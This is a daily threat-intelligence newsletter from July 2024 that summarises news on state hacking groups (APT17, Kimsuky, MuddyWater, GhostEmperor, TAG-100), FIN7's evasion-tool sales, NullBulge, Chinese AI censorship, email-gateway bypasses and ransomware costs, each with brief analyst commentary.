Daily Drop (820): | CN: Socialist AI | NullBulge | BugSleep | DPRK: RGB | TAG-100 | GhostEmperor | FIN7 | SEGs: Bypass | Paris 2024 Olympics | APT17 | Railway Security | GenAI: CNO | CNI Targeted

07-18-24

Thursday, Jul 18 2024 // (IG): BB // ShadowNews // Coffee for Bob

*Started adding the Proof Of Concepts (PoC) if available for mentioned CVE’s :

A Proof of Concept (PoC) is a small exercise to test a certain hypothesis or demonstrate that a potential project can be viable. It's primarily used to verify that certain concepts or theories have the potential for real-world application. The purpose of a PoC is to showcase the feasibility, functionality, and potential of a concept before proceeding to the development of the full-scale project. *

China Deploys Censors to Create Socialist AI

Bottom Line Up Front (BLUF): China's Cyberspace Administration of China (CAC) is mandating AI companies to ensure their large language models (LLMs) embody core socialist values, a move that deepens the country's censorship regime. Companies like ByteDance, Alibaba, Moonshot, and 01.AI are undergoing rigorous government reviews to align their AI models with political sensitivities and President Xi Jinping's ideology.

Analyst Comments: This initiative represents a significant escalation in China's control over AI technologies, ensuring that the digital outputs align with state ideology. By enforcing stringent compliance measures and incorporating political correctness into AI responses, China is setting a global precedent for politically driven AI governance. The approach of integrating ideological filtering mechanisms into AI development demonstrates the CCP's commitment to maintaining ideological purity in the face of advancing technology.

FROM THE MEDIA: The Chinese government is expanding its censorship regime to include AI systems, compelling tech giants and startups to align their large language models with socialist values. The CAC is conducting mandatory reviews of these AI models, focusing on political sensitivity and alignment with President Xi Jinping's doctrines. This process involves extensive testing and filtering of training data to remove content that contradicts core socialist values. Companies must build extensive databases of sensitive keywords and continuously update them. This has led to AI chatbots like Baidu's Ernie and Alibaba's Tongyi Qianwen avoiding politically sensitive topics, often responding with deflections or refusals. ByteDance's chatbot, which excels in compliance, received high marks from Fudan University for its adherence to ideological guidelines.

READ THE STORY:  FT

Russia-Linked FIN7 Hackers Sell Security Evasion Tool on Darknet

Bottom Line Up Front (BLUF): The Russia-linked cybercriminal group FIN7 is selling its custom security evasion tool, AvNeutralizer, on darknet forums. This tool is used by various ransomware groups to bypass threat detection systems and has significantly impacted numerous sectors.

Analyst Comments: FIN7's commercialization of AvNeutralizer highlights the ongoing threat posed by sophisticated cybercriminal groups leveraging advanced tools to enhance their capabilities. The tool's adaptability and the use of multiple pseudonyms by FIN7 complicate attribution and defense efforts. This development underscores the need for robust cybersecurity measures and continuous monitoring to counter the evolving tactics of such groups.

FROM THE MEDIA: FIN7, a notorious Russian cybercriminal group is selling a security evasion tool called AvNeutralizer on darknet forums. Initially used exclusively by the Black Basta group for six months, AvNeutralizer has now been adopted by multiple ransomware groups, including AvosLocker, MedusaLocker, BlackCat, Trigona, and LockBit. Cybersecurity firm SentinelOne discovered advertisements for AvNeutralizer on various underground forums, indicating its sale under pseudonyms like “goodsoft,” “lefroggy,” “killerAV,” and “Stupor.” Priced between $4,000 to $15,000, the tool is customized for each buyer to target specific security systems. Since early 2023, AvNeutralizer has been employed in numerous intrusions. Its latest version includes a novel method for bypassing security measures using a built-in Windows driver, ProcLaunchMon.sys, alongside the Process Explorer driver. This advancement allows the tool to evade detection by compromising endpoint security.

READ THE STORY:  The Record // THN

'NullBulge' Threat Actor Targets Software Supply Chain and AI Tech

Bottom Line Up Front (BLUF): New research by SentinelOne reveals that the threat actor "NullBulge" is targeting the software supply chain and AI-related technologies through hacktivist-themed ransomware attacks. The group has claimed responsibility for stealing data from Disney's Slack channels and conducts financially motivated operations despite its anti-AI, pro-artist persona.

Analyst Comments: NullBulge represents a significant shift in cyber threat landscapes, leveraging low-sophistication yet effective methods to infiltrate software supply chains. Their dual motivation—financial gain masked as hacktivism—illustrates the evolving complexity of modern cyber threats. The group's attacks on both AI-centric entities and unrelated religious organizations highlight a broad target spectrum, indicating that motivations can often be multifaceted and opportunistic rather than purely ideological.

FROM THE MEDIA: SentinelOne's recent report uncovers the operations of NullBulge, a ransomware group disguising its financially motivated attacks as hacktivism. NullBulge has been active since at least April, targeting AI and gaming entities by inserting malicious code into public repositories on platforms like GitHub and Hugging Face. Their attacks include the distribution of malicious mods for video games and poisoning software supply chains with compromised libraries. Despite their hacktivist front, SentinelOne found that NullBulge is financially driven, selling stolen data and OpenAI API keys on dark web forums. The group's use of LockBit ransomware and commodity malware demonstrates a low-sophistication approach, making them notable for their ability to conduct effective attacks with minimal complexity.

READ THE STORY:  Tech Target

TAG-100: New Threat Actor Uses Open-Source Tools for Widespread Attacks

Bottom Line Up Front (BLUF): TAG-100, a newly identified threat actor, is leveraging open-source tools and known vulnerabilities to conduct cyber espionage campaigns against global government and private sector organizations. The group has compromised entities in at least ten countries, utilizing tools like Go backdoors Pantegana and Spark RAT, and focusing on internet-facing devices to gain initial access.

Analyst Comments: The emergence of TAG-100 underscores the persistent threat posed by actors who exploit open-source tools and publicly known vulnerabilities. The group's use of widely available tools and techniques highlights the ongoing challenge of defending against lower-sophistication, high-impact cyber threats. TAG-100's ability to conduct widespread reconnaissance and exploitation activities across various sectors and geographies emphasizes the importance of robust security measures and vigilant monitoring of internet-facing devices.

FROM THE MEDIA: Recorded Future's Insikt Group reports that TAG-100, an unknown threat actor, is executing a cyber espionage campaign using open-source remote access tools. Active since February 2024, TAG-100 has targeted entities across Africa, Asia, North America, South America, and Oceania, including diplomatic and government organizations, as well as sectors such as semiconductors, non-profits, and religious institutions. TAG-100 exploits security flaws in internet-facing devices like Citrix NetScaler, F5 BIG-IP, Zimbra, Microsoft Exchange Server, SonicWall, Cisco ASA, Palo Alto Networks GlobalProtect, and Fortinet FortiGate. Notably, the group conducted significant reconnaissance activity targeting Palo Alto Networks GlobalProtect appliances shortly after a critical vulnerability's public disclosure.

READ THE STORY:  THN

Iranian Cyber Threat Group Deploys New Backdoor 'BugSleep'

Bottom Line Up Front (BLUF): The Iranian cyber-espionage group MuddyWater has introduced a new custom backdoor implant called BugSleep, shifting from their previous reliance on legitimate remote management tools. This transition underscores a strategic adaptation in their cyber-attack methodology.

Analyst Comments: MuddyWater's pivot to deploying a bespoke backdoor like BugSleep indicates a significant evolution in their tactics, possibly driven by increased scrutiny of remote management tools by security vendors. Despite inherent bugs and rapid updates in BugSleep, this development reflects MuddyWater's agility and persistence. Their focus on high-profile targets in Israel, Saudi Arabia, and beyond emphasizes Iran's continued aggressive stance in cyber-espionage.

FROM THE MEDIA: MuddyWater, an Iranian cyber-espionage group associated with the Iranian Ministry of Intelligence and Security (MOIS), has shifted from using legitimate remote management software to deploying a custom backdoor named BugSleep. Initially, they used tools like SimpleHelp and Atera to control infected systems via spear phishing and targeting exposed servers. However, in June, they transitioned to a new method involving a malicious PDF that installs BugSleep through a link hosted on Egnyte. BugSleep, identified by Check Point Software and dubbed MuddyRot by Sekoia, is still under development, featuring typical anti-analysis techniques and encryption—though often improperly implemented. Despite its bugs and frequent updates, this homemade implant signifies MuddyWater's strategic shift likely due to increased monitoring of remote management tools. The group, active since at least 2018, targets government agencies and critical industries, primarily in the Middle East but also in nations like India and Turkey.

READ THE STORY:  Dark Reading

China-Linked APT17 Targets Italian Companies with 9002 RAT Malware

Bottom Line Up Front (BLUF): APT17, a Chinese state-sponsored hacking group, has launched sophisticated cyber espionage campaigns targeting Italian government agencies and companies using the 9002 RAT malware. These attacks involved spear-phishing emails and fake Skype for Business installations to deploy the malware.

Analyst Comments: APT17's continued use of advanced tactics, including the deployment of diskless malware variants and sophisticated spear-phishing lures, underscores the persistent threat posed by state-sponsored cyber espionage groups. The group's ability to adapt and update their malware to evade detection highlights the need for robust cybersecurity measures and continuous monitoring to protect sensitive government and corporate data.

FROM THE MEDIA: Italian cybersecurity firm TG Soft reported that APT17, also known as DeputyDog, launched two targeted attacks on Italian entities on June 24 and July 2, 2024. These campaigns used Office documents and malicious links to trick recipients into downloading a fake Skype for Business package, which installed the 9002 RAT malware. The attacks involved sophisticated techniques, including the use of diskless malware variants and a multi-stage infection chain. The 9002 RAT, a modular trojan, monitors network traffic, captures screenshots, manages processes, and executes additional commands from a remote server. This malware is linked to previous high-profile operations, such as Operation Aurora, which targeted Google and other large companies in 2009. APT17's activities demonstrate a significant threat to governmental and corporate entities, leveraging advanced malware and spear-phishing tactics to gain unauthorized access to sensitive information. The malware's modular design and continuous updates make it a formidable tool for cyber espionage, requiring vigilant cybersecurity practices to mitigate the risks posed by such sophisticated threats.

READ THE STORY:  THN // TG Soft

Generative AI Gives Government Cyber Operations a Boost

Bottom Line Up Front (BLUF): State and local governments are increasingly leveraging generative AI to enhance cybersecurity operations. This advanced AI technology aids in synthesizing threat data, improving incident response, and customizing detection systems, thereby reducing the need for human intervention and enabling more effective defense against sophisticated cyber threats.

Analyst Comments: Generative AI represents a significant advancement in cybersecurity, particularly for government agencies tasked with protecting critical infrastructure. Its ability to process vast amounts of data and provide contextual analysis enhances traditional cybersecurity measures. However, the technology is not without its challenges, including inconsistent outputs and the need for further refinement to ensure reliable, consistent results.

FROM THE MEDIA: State and local government cybersecurity operations are experiencing a transformative boost from generative AI, according to experts interviewed by StateScoop. While AI has long been a staple in cybersecurity for threat detection and incident response, generative AI brings a new layer of sophistication by synthesizing data and providing contextual insights. Andy Hanks, a senior director at the Center for Internet Security, emphasizes the importance of generative AI in quickly processing large volumes of data and contextualizing it, which enhances threat detection and incident response. This technology complements existing expert systems that rely on pattern recognition and frequent updates to detect known threats.

READ THE STORY:  STATESCOOP

North Korean Threat Actor Kimsuky Evolves Despite Sanctions

Bottom Line Up Front (BLUF): Kimsuky, a North Korean state-sponsored hacking group, continues to advance its operations despite international sanctions. Recent research by Rapid7 shows that Kimsuky has expanded its targets beyond North Korean interests to include entities in Japan, the United States, and Europe, using sophisticated phishing techniques and a global infrastructure.

Analyst Comments: Kimsuky's evolution underscores the persistent and adaptive nature of North Korean cyber-espionage efforts. The group's ability to diversify its targets and maintain a rapid development cycle for its malware tools demonstrates the resilience and resourcefulness typical of state-backed cyber operations. The ineffectiveness of sanctions highlights the challenges in curbing cyber threats from autocratic regimes with dedicated intelligence apparatuses like North Korea's Reconnaissance General Bureau (RGB).

FROM THE MEDIA: Rapid7's latest research reveals that Kimsuky, a North Korean hacking group linked to the Reconnaissance General Bureau (RGB), has adapted and expanded its operations despite facing international sanctions. Known for using malicious .LNK files and Compiled HTML Help files delivered via email and phishing techniques, Kimsuky has shifted its focus from primarily targeting government and research entities with North Korean interests to now including entities in Japan, the United States, and Europe. Kimsuky employs a variety of lures, such as nuclear strategy topics, corporate promotional material, and foreign embassy communications, to steal credentials and gain mailbox access for sensitive data theft. The group's operations are bolstered by a globally distributed infrastructure and advanced malware tools, indicating a well-resourced and skilled developer pool.

READ THE STORY:  Cyber Daily AU

'GhostEmperor' Returns: Mysterious Chinese Hacking Group Spotted After Two-Year Hiatus

Bottom Line Up Front (BLUF): GhostEmperor, a covert Chinese hacking group known for sophisticated supply-chain attacks in Southeast Asia, has resurfaced after a two-year absence. The group, renowned for deploying advanced kernel-level rootkits, has been linked to a recent incident involving the compromise of a client's network to access another victim's systems.

Analyst Comments: GhostEmperor's reappearance underscores the persistent and evolving nature of state-sponsored cyber threats. The group's use of kernel-level rootkits, which evade common detection tools, highlights the ongoing challenge of defending against highly skilled adversaries. Their capability to exploit supply-chain vulnerabilities for broader access signifies a mature and strategic approach to cyber espionage, likely driven by geopolitical motives.

FROM THE MEDIA: GhostEmperor, a sophisticated Chinese hacking group, has been identified by cybersecurity firm Sygnia after a two-year period of apparent inactivity. Initially reported by Kaspersky Lab in 2021, GhostEmperor is notorious for executing supply-chain attacks targeting telecommunications and government entities in Southeast Asia. Sygnia's latest report links the group to a recent incident where a compromised network was used to access another system. The group's hallmark is the use of a kernel-level rootkit named Demodex, which provides access to the deepest layers of the operating system, effectively bypassing endpoint detection and response (EDR) software. This sophisticated tool has been updated since its last known variant, indicating ongoing development and enhancement of their methods.

READ THE STORY:  The Record

Threat Actors Ramp Up Use of Encoded URLs to Bypass Secure Email

Bottom Line Up Front (BLUF): Threat actors are increasingly using encoded URLs to bypass Secure Email Gateways (SEGs), exploiting weaknesses in how SEGs handle these URLs. This tactic allows malicious emails to evade detection and reach their targets.

Analyst Comments: The rising use of SEG-encoded URLs by cybercriminals highlights a critical vulnerability in email security infrastructure. SEGs, designed to protect against various email threats, may inadvertently allow malicious links by treating encoded URLs as safe. This underscores the need for enhanced email security measures and continued vigilance from users to recognize and avoid suspicious links, even if they appear encoded or from trusted sources.

FROM THE MEDIA: Cofense researchers have identified a significant increase in cyberattacks using SEG-encoded URLs to bypass email security systems. This tactic involves rewriting URLs in outgoing emails to point to the sender's SEG infrastructure, which then checks the URL's safety. However, some SEGs fail to recognize these encoded URLs as potentially malicious, allowing them to pass through undetected. Max Gannon, threat intelligence manager at Cofense, explains that this issue arises because some SEGs implicitly trust encoded URLs or fail to properly scan them. Attackers exploit this by using SEGs like VIPRE, Bitdefender LinkScan, Hornet Security, and Barracuda to encode malicious URLs, tricking recipient SEGs into accepting them without proper scrutiny.

READ THE STORY:  Dark Reading

Paris 2024 Olympics Face Escalating Cyber-Threats

Bottom Line Up Front (BLUF): Cybersecurity analysts warn of increasing cyber threats targeting the Paris 2024 Olympics, with a notable rise in darknet activity and sophisticated cyber-attacks aimed at exploiting the global event. Phishing kits, fake ticketing platforms, and hacktivist activities are among the primary concerns.

Analyst Comments: The surge in cyber threats surrounding the Paris 2024 Olympics reflects a broader trend of cybercriminals exploiting high-profile events. The proliferation of phishing kits and fake websites poses significant risks to attendees, while the geopolitical motivations of hacktivist groups add another layer of complexity. Robust cybersecurity measures, public awareness, and vigilance are crucial to mitigating these threats and ensuring the safety of participants and spectators.

FROM THE MEDIA: FortiGuard Labs reports a significant increase in cyber threats targeting the Paris 2024 Olympics, with darknet activity surging by 80-90% between the latter half of 2023 and the first half of 2024. Zendata CEO Narayana Pappu emphasizes the heightened cybersecurity risks, noting the nearly 450 million cyber-attacks during the Tokyo Olympics and the growing sophistication of such threats. The report highlights several key concerns, including the rise of phishing kits tailored for the Olympics, which enable cybercriminals to create deceptive emails and websites. These attacks are compounded by fake ticketing platforms and fraudulent merchandise sites, posing financial risks to attendees.

READ THE STORY:  InfoSecMag

Stay Ahead of Quantum Threat to Railway Security

Bottom Line Up Front (BLUF): Benoît Leridon of Nokia warns of increasing cyber threats to digital railway systems, including the emerging risks posed by quantum computing. As railways adopt advanced digital technologies, they must bolster cybersecurity measures to safeguard against these sophisticated threats.

Analyst Comments: The transition to digital railway systems brings both opportunities and challenges. While digitalization enhances efficiency and safety, it also introduces new vulnerabilities. The potential of quantum computing to break current encryption methods is a significant concern. Railway operators must adopt robust, quantum-safe encryption and comprehensive cybersecurity strategies to protect critical infrastructure and ensure safe, reliable operations.

FROM THE MEDIA: As railway systems increasingly rely on digital technologies, cybersecurity has become a paramount concern. Benoît Leridon, Head of Transportation Business for Network Infrastructure at Nokia, highlights the critical need for robust cybersecurity measures to protect against threats, including the emerging risks from quantum computing. Digital railways depend on vast amounts of data for reliable and secure operations. Innovations like AI, IoT, and digital twins are driving automation and efficiency, but also expanding the attack surface. Cyber threats, including eavesdropping, man-in-the-middle attacks, and denial-of-service (DoS) attacks, exploit vulnerabilities in interconnected systems.

READ THE STORY:  Global Railway Review

Items of interest

Ransomware Continues to Pile on Costs for Critical Infrastructure Victims

Bottom Line Up Front (BLUF): Ransomware attacks on critical national infrastructure (CNI) have seen a dramatic rise in costs and recovery times. The median ransom payments have surged to $2.54 million, with significant increases in recovery expenses, particularly in the energy and water sectors.

Analyst Comments: The escalating costs and extended recovery times associated with ransomware attacks on CNI highlight the urgent need for stronger cybersecurity measures and policies. While paying ransoms often seems like a quick fix, it generally fails to reduce recovery times and may encourage further attacks. Organizations must focus on comprehensive defense strategies and resilience planning to mitigate these impacts effectively.

FROM THE MEDIA: Sophos' latest figures reveal a sharp increase in the costs associated with ransomware attacks on CNI organizations. The median ransom payment has soared to $2.54 million, 41 times higher than last year's $62,500. The mean payment for 2024 stands at $3.225 million, reflecting a sixfold increase. The survey, which included 275 CNI organizations, noted that only 86 disclosed their ransom payment details, suggesting that the actual costs could be higher. IT, tech, and telecom sectors reported the lowest average payments at $330,000, whereas lower education and federal government organizations reported the highest, averaging $6.6 million.

READ THE STORY:  The Register

How to Stop an Army of 14 Million Zombie Computers: Ep. 94: Mariposa Botnet (Video)

FROM THE MEDIA: When Chris Davis sniffed out some strange Web traffic patterns, he peeled back the layers to discover one of the largest botnets ever created. But what was it for? And who is behind this malicious network?

The Largest Botnet Ever (Video)

FROM THE MEDIA: Some botnets have grown to incredible sizes and power, but how much damage can they really do? If you enjoyed the video, please leave a like & subscribe as it helps us tremendously.

The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.